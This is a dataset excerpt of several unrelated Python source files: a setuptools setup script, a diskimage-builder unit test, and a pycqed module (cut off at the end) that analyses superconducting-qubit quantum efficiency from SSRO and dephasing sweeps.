content
stringlengths 5
1.05M
|
|---|
from setuptools import setup
setup(
package_dir={'trprimes': 'src/trprimes'},
packages=['trprimes'],
)
|
# Copyright 2016 Andreas Florath (andreas@florath.net)
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from diskimage_builder.block_device.utils import parse_abs_size_spec
from diskimage_builder.block_device.utils import parse_rel_size_spec
import testtools
class TestBlockDeviceUtils(testtools.TestCase):
"""Tests for the utils.py in the block_device dir.
This tests mostly the error and failure cases - because the good
cases are tested implicitly with the higher level unit tests.
"""
def test_parse_rel_size_with_abs(self):
"""Calls parse_rel_size_spec with an absolute number"""
is_rel, size = parse_rel_size_spec("154MiB", 0)
self.assertFalse(is_rel)
self.assertEqual(154 * 1024 * 1024, size)
def test_parse_abs_size_without_spec(self):
"""Call parse_abs_size_spec without spec"""
size = parse_abs_size_spec("198")
self.assertEqual(198, size)
def test_invalid_unit_spec(self):
"""Call parse_abs_size_spec with invalid unit spec"""
self.assertRaises(RuntimeError, parse_abs_size_spec, "747InVaLiDUnIt")
def test_broken_unit_spec(self):
"""Call parse_abs_size_spec with a completely broken unit spec"""
self.assertRaises(RuntimeError, parse_abs_size_spec, "_+!HuHi+-=")
|
DATA = 'a'
|
'''
Collection of classes to analyse Quantum efficiency measurements.
General procedure is:
- find factor 'a' of the quadratic scaling of the Single-Shot-Readout as a function of scaling_amp (see SSROAnalysis class)
- find sigma from the Gaussian fit of the Dephasing as a function of scaling_amp (see dephasingAnalysis class)
- Calculate eta = a * sigma**2 / 2 (see QuantumEfficiencyAnalysis class)
For details, see https://arxiv.org/abs/1711.05336
Lastly, the QuantumEfficiencyAnalysisTWPA class allows for analysing the efficiency
as a function of TWPA power and frequency.
Hacked together by Rene Vollmer
'''
import datetime
import pycqed.analysis_v2.base_analysis as ba
from pycqed.analysis_v2.base_analysis import plot_scatter_errorbar_fit, plot_scatter_errorbar
import numpy as np
import lmfit
import os
from pycqed.analysis import analysis_toolbox as a_tools
from collections import OrderedDict
import copy
from pycqed.analysis.measurement_analysis import MeasurementAnalysis
from copy import deepcopy
class QuantumEfficiencyAnalysisTWPA(ba.BaseDataAnalysis):
'''
Analyses Quantum efficiency measurements as a function of TWPA Pump frequency and power.
'''
def __init__(self, t_start: str = None, t_stop: str = None,
label_dephasing: str = '_dephasing',
label_ssro: str = '_SSRO', label: str = '',
options_dict: dict = None,
extract_only: bool = False, auto: bool = True,
close_figs: bool = True, do_fitting: bool = True,
twpa_pump_freq_key: str = 'Instrument settings.TWPA_Pump.frequency',
twpa_pump_power_key: str = 'Instrument settings.TWPA_Pump.power',
use_prefit: bool = False):
'''
:param t_start: start time of scan as a string of format YYYYMMDD_HHmmss
:param t_stop: end time of scan as a string of format YYYYMMDD_HHmmss
:param options_dict: Available options are the ones from the base_analysis and:
- individual_plots : plot all the individual fits?
- cmap : colormap for 2D plots
- plotsize : plotsize for 2D plots
- (todo)
:param auto: Execute all steps automatically
:param close_figs: Close the figure (do not display)
:param extract_only: Should we also do the plots?
:param do_fitting: Should the run_fitting method be executed?
:param label_dephasing: the label that was used to name the dephasing measurements
:param label_ssro: the label that was used to name the SSRO measurements
:param label: (Optional) common label that was used to name all measurements
:param twpa_pump_freq_key: key for the TWPA Pump Frequency, e.g. 'Instrument settings.TWPA_Pump.frequency'
:param twpa_pump_power_key: key for the TWPA Pump Power, e.g. 'Instrument settings.TWPA_Pump.power'
'''
super().__init__(t_start=t_start, t_stop=t_stop,
label=label,
options_dict=options_dict,
do_fitting=do_fitting,
close_figs=close_figs,
extract_only=extract_only)
self.use_prefit = use_prefit
self.label_dephasing = label_dephasing
self.label_ssro = label_ssro
self.params_dict = {'TWPA_freq': twpa_pump_freq_key,
'measurementstring': 'measurementstring',
'TWPA_power': twpa_pump_power_key}
self.numeric_params = ['TWPA_freq', 'TWPA_power']
if use_prefit:
self.params_dict['a'] = 'Analysis.coherence_analysis.a'
self.params_dict['a_std'] = 'Analysis.coherence_analysis.a_std'
self.params_dict['sigma'] = 'Analysis.coherence_analysis.sigma'
self.params_dict['sigma_std'] = 'Analysis.coherence_analysis.sigma_std'
self.params_dict['eta'] = 'Analysis.coherence_analysis.eta'
self.params_dict['u_eta'] = 'Analysis.coherence_analysis.u_eta'
self.numeric_params.append('a')
self.numeric_params.append('a_std')
self.numeric_params.append('sigma')
self.numeric_params.append('sigma_std')
self.numeric_params.append('eta')
self.numeric_params.append('u_eta')
if auto:
self.run_analysis()
def extract_data(self):
super().extract_data()
# Sort data by frequencies and power
self.proc_data_dict = {}
twpa_freqs_unsorted = np.array(self.raw_data_dict['TWPA_freq'], dtype=float)
twpa_freqs = np.unique(twpa_freqs_unsorted)
twpa_freqs.sort()
twpa_powers_unsorted = np.array(self.raw_data_dict['TWPA_power'], dtype=float)
twpa_powers = np.unique(twpa_powers_unsorted)
twpa_powers.sort()
self.proc_data_dict['TWPA_freqs'] = twpa_freqs
self.proc_data_dict['TWPA_powers'] = twpa_powers
if self.verbose:
print('Found %d twpa freqs and %d amplitudes' % (len(twpa_freqs), len(twpa_powers)))
print(twpa_freqs, twpa_powers)
dates = np.array([[None] * len(twpa_powers)] * len(twpa_freqs))
# date_limits = np.array([[(None, None)] * len(twpa_powers)] * len(twpa_freqs))
datetimes = np.array(self.raw_data_dict['datetime'], dtype=datetime.datetime)
for i, twpa_freq in enumerate(twpa_freqs):
freq_indices = np.where(twpa_freqs_unsorted == twpa_freq)
for j, twpa_power in enumerate(twpa_powers):
power_indices = np.where(twpa_powers_unsorted == twpa_power)
indices = np.array(np.intersect1d(freq_indices, power_indices), dtype=int)
if self.use_prefit:
if len(indices) > 1:
print("Warning: more than one efficiency value found for freq %.3f and power %.3f"%(twpa_freq*1e-9,twpa_power))
elif len(indices) == 1:
print("Warning:no efficiency value found for freq %.3f and power %.3f"%(twpa_freq*1e-9,twpa_power))
dates = indices[0]
else:
dts = datetimes[indices]
dates[i, j] = dts
# date_limits[i, j][0] = np.min(dts)
# date_limits[i, j][1] = np.max(dts)
if self.use_prefit:
self.proc_data_dict['sorted_indices'] = np.array(dates, dtype=int)
else:
self.proc_data_dict['sorted_datetimes'] = dates
# self.proc_data_dict['sorted_date_limits'] = date_limits
def process_data(self):
twpa_freqs = self.proc_data_dict['TWPA_freqs']
twpa_powers = self.proc_data_dict['TWPA_powers']
dates = self.proc_data_dict['sorted_datetimes']
sorted_indices = self.proc_data_dict['sorted_indices']
# date_limits = self.proc_data_dict['sorted_date_limits']
eta = np.array([[None] * len(twpa_powers)] * len(twpa_freqs), dtype=float)
u_eta = np.array([[None] * len(twpa_powers)] * len(twpa_freqs), dtype=float)
sigma = np.array([[None] * len(twpa_powers)] * len(twpa_freqs), dtype=float)
u_sigma = np.array([[None] * len(twpa_powers)] * len(twpa_freqs), dtype=float)
a = np.array([[None] * len(twpa_powers)] * len(twpa_freqs), dtype=float)
u_a = np.array([[None] * len(twpa_powers)] * len(twpa_freqs), dtype=float)
objects = np.array([[None] * len(twpa_powers)] * len(twpa_freqs), dtype=QuantumEfficiencyAnalysis)
d = copy.deepcopy(self.options_dict)
d['save_figs'] = False
for i, freq in enumerate(twpa_freqs):
for j, power in enumerate(twpa_powers):
if self.use_prefit:
index = sorted_indices[i, j]
a[i, j] = self.raw_data_dict['a'][index]
u_a[i, j] = self.raw_data_dict['a_std'][index]
sigma[i, j] = self.raw_data_dict['sigma'][index]
u_sigma[i, j] = self.raw_data_dict['sigma_std'][index]
eta[i, j] = self.raw_data_dict['eta'][index]
u_eta[i, j] = self.raw_data_dict['u_eta'][index]
else:
t_start = [d.strftime("%Y%m%d_%H%M%S") for d in dates[i, j]] # date_limits[i, j][0]
t_stop = None # date_limits[i, j][1]
# print(t_start, t_stop)
qea = QuantumEfficiencyAnalysis(t_start=t_start, t_stop=t_stop, label_dephasing=self.label_dephasing,
label_ssro=self.label_ssro, options_dict=d, auto=False,
extract_only=True)
qea.run_analysis()
a[i, j] = qea.fit_dicts['a']
u_a[i, j] = qea.fit_dicts['a_std']
sigma[i, j] = qea.fit_dicts['sigma']
u_sigma[i, j] = qea.fit_dicts['sigma_std']
eta[i, j] = qea.fit_dicts['eta']
u_eta[i, j] = qea.fit_dicts['u_eta']
objects[i, j] = qea
if not self.use_prefit:
self.proc_data_dict['analysis_objects'] = objects
self.proc_data_dict['as'] = a
self.proc_data_dict['as_std'] = u_a
self.proc_data_dict['sigmas'] = sigma
self.proc_data_dict['sigmas_std'] = u_sigma
self.proc_data_dict['etas'] = eta
self.proc_data_dict['etas_std'] = u_eta
self.proc_data_dict['as'] = a
self.proc_data_dict['as_std'] = u_a
self.proc_data_dict['sigmas'] = sigma
self.proc_data_dict['sigmas_std'] = u_sigma
self.proc_data_dict['etas'] = eta
self.proc_data_dict['etas_std'] = u_eta
def prepare_plots(self):
title = ('\n' + self.timestamps[0] + ' - "' +
self.raw_data_dict['measurementstring'] + '"')
twpa_powers = self.proc_data_dict['TWPA_powers']
twpa_freqs = self.proc_data_dict['TWPA_freqs']
# Quantum Efficiency
self.plot_dicts['quantum_eff'] = {
'plotfn': self.plot_colorxy,
'title': title,
'yvals': twpa_powers, 'ylabel': r'TWPA Power', 'yunit': 'dBm',
'xvals': twpa_freqs, 'xlabel': 'TWPA Frequency', 'xunit': 'Hz',
'zvals': self.proc_data_dict['etas'].transpose() * 100,
'zlabel': r'Quantum efficiency $\eta$ (%)',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
self.plot_dicts['quantum_eff_vari'] = {
'plotfn': self.plot_colorxy,
'title': '' + title,
'yvals': twpa_powers, 'ylabel': r'TWPA Power', 'yunit': 'dBm',
'xvals': twpa_freqs, 'xlabel': 'TWPA Frequency', 'xunit': 'Hz',
'zvals': self.proc_data_dict['etas_std'].transpose(),
'zlabel': r'Quantum efficiency Deviation $\delta \eta$',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
# SSRO Slope
self.plot_dicts['ssro_slope'] = {
'plotfn': self.plot_colorxy,
'title': '' + title, # todo
'yvals': twpa_powers, 'ylabel': r'TWPA Power', 'yunit': 'dBm',
'xvals': twpa_freqs, 'xlabel': 'TWPA Frequency', 'xunit': 'Hz',
'zvals': self.proc_data_dict['as'].transpose(),
'zlabel': r'SSRO slope $a$',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
self.plot_dicts['ssro_slope_vari'] = {
'plotfn': self.plot_colorxy,
'title': '' + title, # todo
'yvals': twpa_powers, 'ylabel': r'TWPA Power', 'yunit': 'dBm',
'xvals': twpa_freqs, 'xlabel': 'TWPA Frequency', 'xunit': 'Hz',
'zvals': self.proc_data_dict['as_std'].transpose(),
'zlabel': r'SSRO slope variance $\delta a$',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
# Dephasing Gauss Width
self.plot_dicts['dephasing_gauss_width'] = {
'plotfn': self.plot_colorxy,
'title': '', # todo
'yvals': twpa_powers, 'ylabel': r'TWPA Power', 'yunit': 'dBm',
'xvals': twpa_freqs, 'xlabel': 'TWPA Frequency', 'xunit': 'Hz',
'zvals': self.proc_data_dict['sigmas'].transpose(),
'zlabel': r'dephasing Gauss width $\sigma$',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
self.plot_dicts['dephasing_gauss_width_vari'] = {
'plotfn': self.plot_colorxy,
'title': '' + title, # todo
'yvals': twpa_powers, 'ylabel': r'TWPA Power', 'yunit': 'dBm',
'xvals': twpa_freqs, 'xlabel': 'TWPA Frequency', 'xunit': 'Hz',
'zvals': self.proc_data_dict['sigmas_std'].transpose(),
'zlabel': r'dephasing Gauss width variance $\delta\sigma$',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
if self.options_dict.get('individual_plots', False):
# todo: add 1D plot from QuantumEfficiencyAnalysis
for i, twpa_freq in enumerate(twpa_freqs):
for j, twpa_power in enumerate(twpa_powers):
pre = 'freq_%.3f-power_%.3f-' % (twpa_freq, twpa_power)
obj = self.proc_data_dict['analysis_objects'][i, j]
for k in ['amp_vs_dephasing_coherence', 'amp_vs_dephasing_fit', ]:
self.plot_dicts[pre + k] = obj.ra.plot_dicts[k]
self.plot_dicts[pre + k]['ax_id'] = pre + 'snr_analysis'
for k in ['amp_vs_SNR_fit', 'amp_vs_SNR_scatter', ]:
self.plot_dicts[pre + k] = obj.ssro.plot_dicts[k]
self.plot_dicts[pre + k]['ax_id'] = pre + 'snr_analysis'
class QuantumEfficiencyAnalysis(ba.BaseDataAnalysis):
'''
Analyses one set of Quantum efficiency measurements
'''
def __init__(self, t_start: str = None, t_stop: str = None,
label_dephasing: str = '_dephasing', label_ssro: str = '_SSRO',
options_dict: dict = None, options_dict_ssro: dict = None,
options_dict_dephasing: dict = None,
extract_only: bool = False, auto: bool = True,
close_figs: bool = True, do_fitting: bool = True,
use_sweeps: bool = True):
'''
:param t_start: start time of scan as a string of format YYYYMMDD_HHmmss
:param t_stop: end time of scan as a string of format YYYYMMDD_HHmmss
:param options_dict: Available options are the ones from the base_analysis and:
- individual_plots : plot all the individual fits?
- cmap : colormap for 2D plots
- plotsize : plotsize for 2D plots
- (todo)
:param options_dict_dephasing: same as options_dict, but exclusively for
the dephasing analysis.
:param options_dict_ssro: same as options_dict, but exclusively for
the ssro analysis.
:param auto: Execute all steps automatically
:param close_figs: Close the figure (do not display)
:param extract_only: Should we also do the plots?
:param do_fitting: Should the run_fitting method be executed?
:param label_dephasing: the label to identify the dephasing measurements
:param label_ssro: the label to identify the SSRO measurements
:param use_sweeps: True: Use the datat from one sweep folder.
False: Collect the results from the individual
measurements (not tested yet)
'''
super().__init__(t_start=t_start, t_stop=t_stop,
options_dict=options_dict,
do_fitting=do_fitting,
close_figs=close_figs,
extract_only=extract_only,
)
if options_dict_dephasing is None:
options_dict_dephasing = {}
if options_dict_ssro is None:
options_dict_ssro = {}
d = copy.deepcopy(self.options_dict)
d['save_figs'] = False
dr = {**d, **options_dict_dephasing}
ds = {**d, **options_dict_ssro}
if use_sweeps:
self.ra = DephasingAnalysisSweep(t_start=t_start, t_stop=t_stop,
label=label_dephasing,
options_dict=dr, auto=False,
extract_only=True)
self.ssro = SSROAnalysisSweep(t_start=t_start, t_stop=t_stop,
label=label_ssro,
options_dict=ds, auto=False,
extract_only=True)
else:
self.ra = DephasingAnalysisSingleScans(t_start=t_start, t_stop=t_stop,
label=label_dephasing,
options_dict=dr, auto=False,
extract_only=True)
self.ssro = SSROAnalysisSingleScans(t_start=t_start, t_stop=t_stop,
label=label_ssro,
options_dict=ds, auto=False,
extract_only=True)
if auto:
self.run_analysis()
def extract_data(self):
self.raw_data_dict = OrderedDict()
self.ra.extract_data()
self.ssro.extract_data()
youngest = max(np.max(np.array(self.ra.raw_data_dict['datetime'], dtype=datetime.datetime)),
np.max(np.array(self.ssro.raw_data_dict['datetime'], dtype=datetime.datetime)))
youngest += datetime.timedelta(seconds=1)
self.raw_data_dict['datetime'] = [youngest]
self.raw_data_dict['timestamps'] = [youngest.strftime("%Y%m%d_%H%M%S")]
self.timestamps = [youngest.strftime("%Y%m%d_%H%M%S")]
f = '%s_quantum_efficiency_analysis' % (youngest.strftime("%H%M%S"))
d = '%s' % (youngest.strftime("%Y%m%d"))
folder = os.path.join(a_tools.datadir, d, f)
self.raw_data_dict['folder'] = [folder]
self.raw_data_dict['measurementstring'] = f
self.options_dict['analysis_result_file'] = os.path.join(folder, f + '.hdf5')
def run_fitting(self):
self.ra.run_analysis()
self.ssro.run_analysis()
self.fit_dicts = OrderedDict()
self.fit_dicts['sigma'] = self.ra.fit_res['coherence_fit'].params['sigma'].value
self.fit_dicts['sigma_std'] = self.ra.fit_res['coherence_fit'].params['sigma'].stderr
# self.raw_data_dict['scale'] = self.ra.fit_dicts['coherence_fit']['scale']
self.fit_dicts['a'] = self.ssro.fit_res['snr_fit'].params['a'].value
self.fit_dicts['a_std'] = self.ssro.fit_res['snr_fit'].params['a'].stderr
sigma = self.fit_dicts['sigma']
u_sigma = self.fit_dicts['sigma_std']
a = self.fit_dicts['a']
u_a = self.fit_dicts['a_std']
eta = (a * sigma) ** 2 / 2
u_eta = 2 * (u_a / a + u_sigma / sigma) * eta
if self.verbose:
print('eta = %.4f +- %.4f' % (eta, u_eta))
self.fit_dicts['eta'] = eta
self.fit_dicts['u_eta'] = u_eta
# For saving
self.fit_res = OrderedDict()
self.fit_res['quantum_efficiency'] = OrderedDict()
self.fit_res['quantum_efficiency']['eta'] = eta
self.fit_res['quantum_efficiency']['u_eta'] = u_eta
self.fit_res['quantum_efficiency']['sigma'] = sigma
self.fit_res['quantum_efficiency']['sigma_std'] = u_sigma
self.fit_res['quantum_efficiency']['a'] = a
self.fit_res['quantum_efficiency']['a_std'] = u_a
def prepare_plots(self):
title = ('\n' + self.timestamps[0] + ' - "' +
self.raw_data_dict['measurementstring'] + '"')
self.ra.prepare_plots()
dicts = OrderedDict()
for d in self.ra.plot_dicts:
dicts[d] = self.ra.plot_dicts[d]
self.ssro.prepare_plots()
for d in self.ssro.plot_dicts:
dicts[d] = self.ssro.plot_dicts[d]
if self.options_dict.get('subplots', True):
self.plot_dicts = deepcopy(dicts)
for k in ['amp_vs_dephasing_fitted',
'amp_vs_dephasing_not_fitted',
'amp_vs_dephasing_fit',
'amp_vs_SNR_scatter_fitted',
'amp_vs_SNR_scatter_not_fitted',
'amp_vs_SNR_fit',]:
if k in dicts:
k2 = 'quantum_eff_analysis_' + k
self.plot_dicts[k2] = dicts[k]
self.plot_dicts[k2]['ax_id'] = 'quantum_eff_analysis'
self.plot_dicts[k2]['ylabel'] = 'SNR, coherence'
self.plot_dicts[k2]['yunit'] = '(-)'
self.plot_dicts[k2]['title'] = ''
self.plot_dicts['amp_vs_SNR_fit']['do_legend'] = True
self.plot_dicts['amp_vs_dephasing_fit']['do_legend'] = True
res = self.fit_res['quantum_efficiency']
t = '$\sigma=%.3f\pm%.3f$'%(res['sigma'], res['sigma_std'])
self.plot_dicts['quantum_eff_analysis_sigma_text'] = {
'ax_id': 'quantum_eff_analysis',
'plotfn': self.plot_line,
'xvals': [0,0], 'yvals': [0,0],
'marker': None,
'linestyle': '',
'setlabel': t,
'do_legend': True,
}
t = '$a=%.3f\pm%.3f$'%(res['a'], res['a_std'])
self.plot_dicts['quantum_eff_analysis_a_text'] = {
'ax_id': 'quantum_eff_analysis',
'plotfn': self.plot_line,
'xvals': [0,0], 'yvals': [0,0],
'marker': None,
'linestyle': '',
'setlabel': t,
'do_legend': True,
}
t = '$\eta=%.3f\pm%.3f$'%(res['eta'], res['u_eta'])
self.plot_dicts['quantum_eff_analysis_qeff_text'] = {
'ax_id': 'quantum_eff_analysis',
'plotfn': self.plot_line,
'xvals': [0,0], 'yvals': [0,0],
'marker': None,
'linestyle': '',
'setlabel': t,
'do_legend': True,
}
class DephasingAnalysis(ba.BaseDataAnalysis):
'''
options_dict options:
- fit_phase_offset (bool) - Fit the phase offset?
- default_phase_offset (float) - Fixed value for the phase offset.
Ignored if fit_phase_offset=True
- amp_threshold: (float) - maximal amplitude to fit.
Do not set or set to False to fit all data.
'''
def process_data(self):
# Remove None entries
dephasing = self.raw_data_dict['dephasing']
amps = self.raw_data_dict['scaling_amp']
mask = np.intersect1d(np.where(dephasing != None), np.where(amps != None))
self.proc_data_dict['scaling_amp'] = amps[mask]
self.proc_data_dict['coherence'] = dephasing[mask]
self.proc_data_dict['phase'] = self.raw_data_dict['phase'][mask]
# Fitting mask
mask = range(0, len(amps))
inv_mask = []
if self.options_dict.get('amp_threshold', False):
mask = np.where(amps < self.options_dict['amp_threshold'])
inv_mask = np.where(amps >= self.options_dict['amp_threshold'])
self.proc_data_dict['fitting_mask'] = mask
self.proc_data_dict['fitting_mask_inv'] = inv_mask
def prepare_fitting(self):
self.fit_dicts = OrderedDict()
coherence = self.proc_data_dict['coherence']
amps = self.proc_data_dict['scaling_amp']
mask = self.proc_data_dict['fitting_mask']
amps = amps[mask]
coherence = coherence[mask]
def gaussian(x, sigma, scale):
return scale * np.exp(-(x) ** 2 / (2 * sigma ** 2))
gmodel = lmfit.models.Model(gaussian)
gmodel.set_param_hint('sigma', value=0.5, min=0, max=100)
gmodel.set_param_hint('scale', value=np.max(coherence)) # , min=0.1, max=100)
gpara = gmodel.make_params()
self.fit_dicts['coherence_fit'] = {
'model': gmodel,
'fit_xvals': {'x': amps},
'fit_yvals': {'data': coherence},
'guess_pars': gpara,
}
def run_fitting(self):
super().run_fitting()
sigma = self.fit_res['coherence_fit'].params['sigma'].value
cexp = '-1/(2*%.5f*s**2)'%((sigma**2),)
def square(x, s, b):
return ((s*(x**2) + b)+self.wrap_phase %360)-self.wrap_phase
def minimizer_function_vec(params, x, data):
s = params['s']
b = params['b']
return np.abs(((square(x, s, b)-data)))
def minimizer_function(params, x, data):
return np.sum(minimizer_function_vec(params, x, data))
phase = self.proc_data_dict['phase']
amps = self.proc_data_dict['scaling_amp']
mask = self.proc_data_dict['fitting_mask']
amps = amps[mask]
phase = phase[mask]
def fit_phase(amps, phase):
params = lmfit.Parameters()
params.add('s', value=3/sigma, min=-200, max=200, vary=True)
i = max(int(round(len(phase)/10)), 1)
fit_offset = self.options_dict.get('fit_phase_offset', False)
dpo = self.options_dict.get('default_phase_offset', 180)
self.phase_sign = self.options_dict.get('phase_sign', 1)
phase_guess = np.mean(phase[0:i]) if fit_offset else dpo
params.add('b', value=phase_guess, min=-360, max=360, vary=True)
params.add('c', expr=cexp, vary=True)
mini = lmfit.Minimizer(minimizer_function, params=params, fcn_args=(amps, phase))
res = mini.minimize(method='differential_evolution')
if not fit_offset:
return res, res
params2 = lmfit.Parameters()
params2.add('s', value=res.params['s'].value, min=0.01, max=200, vary=True)
params2.add('b', value=res.params['b'].value, min=-360, max=360, vary=True)
params2.add('c', expr=cexp)
mini2 = lmfit.Minimizer(minimizer_function, params=params2, fcn_args=(amps, phase))
res2 = mini2.minimize(method='differential_evolution')
if res.chisqr < res2.chisqr:
return res, res
else:
return res2, res
res, res_old = fit_phase(amps, phase)
self.fit_res['coherence_phase_fit'] = res
fit_amps = np.linspace(min(amps), max(amps), 300)
fit_phase = square(x=fit_amps, s=res.params['s'].value, b=res.params['b'].value)
guess_phase = square(x=fit_amps, s=res_old.params['s'].init_value,
b=res_old.params['b'].init_value)
self.proc_data_dict['coherence_phase_fit'] = {'amps': fit_amps,
'phase': fit_phase,
'phase_guess' : guess_phase}
def prepare_plots(self):
t = self.timestamps[0]
phase_fit_params = self.fit_res['coherence_phase_fit'].params
amps = self.proc_data_dict['scaling_amp']
fit_text = "$\sigma = %.3f \pm %.3f$" % (
self.fit_res['coherence_fit'].params['sigma'].value,
self.fit_res['coherence_fit'].params['sigma'].stderr)
fit_text += '\n$c=%.5f$'%(phase_fit_params['c'].value)
self.plot_dicts['text_msg_amp_vs_dephasing'] = {
'ax_id': 'amp_vs_dephasing',
# 'ypos': 0.15,
'plotfn': self.plot_text,
'box_props': 'fancy',
'text_string': fit_text,
}
'dirty hack to rescale y-axis in the plots'
b=self.fit_res['coherence_fit']
scale_amp=b.best_values['scale']
self.plot_dicts['amp_vs_dephasing_fit'] = {
'plotfn': self.plot_fit,
#'plot_init' : True,
'ax_id': 'amp_vs_dephasing',
'plot_normed':True,
'zorder': 5,
'fit_res': self.fit_res['coherence_fit'],
'xvals': amps,
'marker': '',
'linestyle': '-',
'ylabel': r'Relative contrast', #r'Coherence, $\left| \rho_{01} \right|$'
'yunit': '',
'xlabel': 'scaling amplitude',
'xunit': 'rel. amp.',
'setlabel': 'coherence fit',
'color': 'red',
}
fit_text = 'Fit Result:\n$y=s \cdot x^2 + \\varphi$\n'
fit_text += '$s=%.2f$, '%(phase_fit_params['s'].value) #, phase_fit_params['s'].stderr
fit_text += '$\\varphi=%.1f$\n'%(phase_fit_params['b'].value) #, phase_fit_params['b'].stderr
fit_text += '$\Rightarrow c=%.5f$'%(phase_fit_params['c'].value)
self.plot_dicts['text_msg_amp_vs_dephasing_phase'] = {
'ax_id': 'amp_vs_dephasing_phase',
'xpos': 1.05,
'plotfn': self.plot_text,
'box_props': 'fancy',
'horizontalalignment': 'left',
'text_string': fit_text,
}
self.plot_dicts['amp_vs_dephasing_phase_fit'] = {
'plotfn': self.plot_line,
'ax_id': 'amp_vs_dephasing_phase',
'zorder': 5,
'xvals': self.proc_data_dict['coherence_phase_fit']['amps'],
'yvals': self.proc_data_dict['coherence_phase_fit']['phase'],
'marker': '',
'linestyle': '-',
'ylabel': r'Phase',
'yunit': 'Deg.',
'xlabel': 'scaling amplitude',
'xunit': 'rel. amp.',
'setlabel': 'phase fit',
'color': 'red',
}
if self.options_dict.get('plot_guess', False):
self.plot_dicts['amp_vs_dephasing_phase_fit_guess'] = {
'plotfn': self.plot_line,
'ax_id': 'amp_vs_dephasing_phase',
'zorder': 1,
'xvals': self.proc_data_dict['coherence_phase_fit']['amps'],
'yvals': self.proc_data_dict['coherence_phase_fit']['phase_guess'],
'marker': '',
'linestyle': '-',
'ylabel': r'Phase',
'yunit': 'Deg.',
'xlabel': 'scaling amplitude',
'xunit': 'rel. amp.',
'setlabel': 'phase fit (guess)',
'color': 'lightgray',
'alpha' : 0.1,
}
fit_mask = self.proc_data_dict['fitting_mask']
fit_mask_inv = self.proc_data_dict['fitting_mask_inv']
use_ext = len(fit_mask) > 0 and len(fit_mask_inv) > 0
if len(fit_mask) > 0:
label1 = 'Coherence data'
label2 = 'Phase'
if use_ext:
label1 += ' (used in fitting)'
label2 += ' (used in fitting)'
self.plot_dicts['amp_vs_dephasing_fitted'] = {
'title' : t,
'plotfn': self.plot_line,
'ax_id': 'amp_vs_dephasing',
'zorder': 0,
'xvals': amps[fit_mask],
'yvals': self.proc_data_dict['coherence'][fit_mask]/scale_amp,
'marker': 'o',
'linestyle': '',
'setlabel': label1,
'color': 'red',
}
self.plot_dicts['amp_vs_dephasing_phase_not_fitted'] = {
'title' : t,
'plotfn': self.plot_line,
'ax_id': 'amp_vs_dephasing_phase',
'xvals': amps[fit_mask],
'yvals': self.proc_data_dict['phase'][fit_mask],
'marker': 'x',
'linestyle': '',
'ylabel': label2,
'yunit': 'deg.',
'xlabel': 'scaling amplitude',
'xunit': 'rel. amp.',
'setlabel': 'dephasing phase data',
}
if len(fit_mask_inv) > 0:
label1 = 'Coherence data'
label2 = 'Phase'
if use_ext:
label1 += ' (not fitted)'
label2 += ' (not fitted)'
self.plot_dicts['amp_vs_dephasing_not_fitted'] = {
'title' : t,
'plotfn': self.plot_line,
'ax_id': 'amp_vs_dephasing',
'zorder': 1,
'xvals': amps[fit_mask_inv],
'yvals': self.proc_data_dict['coherence'][fit_mask_inv],
'marker': 'x',
'linestyle': '',
'setlabel': label1,
'color': 'red',
}
self.plot_dicts['amp_vs_dephasing_phase_not_fitted'] = {
'title' : t,
'plotfn': self.plot_line,
'ax_id': 'amp_vs_dephasing_phase',
'xvals': amps[fit_mask_inv],
'yvals': self.proc_data_dict['phase'][fit_mask_inv],
'marker': 'x',
'linestyle': '',
'ylabel': label2,
'yunit': 'deg.',
'xlabel': 'scaling amplitude',
'xunit': 'rel. amp.',
'setlabel': 'dephasing phase data',
}
class DephasingAnalysisSweep(DephasingAnalysis):
'''
Gathers/Loads data from a single coherence/dephasing (e.g. Ramsey/) sweep scan
and analyses it (see DephasingAnalysis).
'''
def __init__(self, t_start: str = None, t_stop: str = None,
label: str = '_ro_amp_sweep_dephasing',
options_dict: dict = None, extract_only: bool = False,
auto: bool = True, close_figs: bool = True,
do_fitting: bool = True):
super().__init__(t_start=t_start, t_stop=t_start,
label=label,
options_dict=options_dict,
do_fitting=do_fitting,
close_figs=close_figs,
extract_only=extract_only,
)
self.single_timestamp = True
ts = a_tools.get_timestamps_in_range(timestamp_start=t_start,
timestamp_end=t_stop, label=label,
exact_label_match=True)
if self.verbose:
print('DephasingAnalysisSweep', ts)
assert len(ts) == 1, 'Expected a single match, found %d'%len(ts)
self.timestamp = ts[0]
if auto:
self.run_analysis()
def extract_data(self):
self.raw_data_dict = OrderedDict()
data_file = MeasurementAnalysis(label=self.labels[0],
timestamp=self.timestamp,
auto=True, TwoD=False)
dateobj = a_tools.datetime_from_timestamp(self.timestamp)
self.timestamps = [self.timestamp]
self.raw_data_dict['timestamps'] = [self.timestamp]
self.raw_data_dict['datetime'] = np.array([dateobj], dtype=datetime.datetime)
temp = data_file.load_hdf5data()
data_file.get_naming_and_values()
self.raw_data_dict['scaling_amp'] = data_file.sweep_points
self.raw_data_dict['dephasing'] = np.array(data_file.measured_values[0], dtype=float)
self.wrap_phase=self.options_dict.get('wrap_phase',0)
phase_raw=np.array(data_file.measured_values[1], dtype=float)
self.raw_data_dict['phase'] = (phase_raw+self.wrap_phase)%360-self.wrap_phase
self.raw_data_dict['folder'] = data_file.folder
class DephasingAnalysisSingleScans(DephasingAnalysis):
'''
Gathers/Loads data from a range of single coherence/dephasing scans (e.g. Ramsey/)
and analyses it (see DephasingAnalysis).
options_dict options:
- Inherited option from DephasingAnalysis
- scaling_amp_key_dephasing (string) - key of the scaling amp in the hdf5 file
e.g. 'Instrument settings.RO_lutman.M_amp_R0'
